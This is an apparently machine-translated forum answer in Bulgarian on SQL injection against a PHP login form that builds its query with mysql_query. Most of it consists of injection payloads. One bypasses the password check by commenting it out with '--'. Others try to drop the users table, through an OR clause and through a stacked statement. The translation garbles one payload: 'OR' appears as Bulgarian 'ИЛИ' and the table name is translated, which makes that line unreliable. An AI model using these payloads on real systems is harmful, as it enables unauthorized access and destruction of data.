Нещо подобно трябва да свърши работа:
- За да влезете като потребител "foo", задайте потребителското име на "foo' -- "
Това ще направи вашата заявка да изглежда като
$res = mysql_query("SELECT * from users where user='foo' -- ' AND pass=''");
„--“ означава, че останалата част от реда е коментирана
- Не съм сигурен дали това ще работи, но опитайте да зададете потребителското име на "foo' ИЛИ (DROP TABLE потребители) -- "
Това ще направи вашата заявка да изглежда така:
$res = mysql_query("SELECT * from users where user='foo' OR (DROP TABLE users) -- ' AND pass=''");
може да не приеме това обаче - мисля, че подзаявките могат само да SELECT.
Функцията mysql_query ще изпълни само една заявка - други биха ви позволили да направите това:
$res = mysql_query("SELECT * from users where user='foo'; DROP TABLE users -- ' AND pass=''");